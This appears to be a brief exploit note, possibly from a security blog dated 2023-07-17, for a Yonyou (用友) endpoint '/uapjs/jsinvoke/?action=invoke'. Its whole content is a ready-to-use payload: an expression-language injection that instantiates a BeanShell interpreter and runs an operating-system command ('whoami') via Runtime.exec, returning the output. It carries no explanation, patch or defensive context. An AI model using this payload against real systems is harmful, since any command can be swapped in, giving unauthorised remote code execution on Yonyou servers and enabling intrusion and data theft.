用友/uapjs/jsinvoke/?action=invoke

Admin / 2023-07-17 / 原文

${param.getClass().forName(param.bsh).newInstance().eval(param.cmd)}

bsh=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())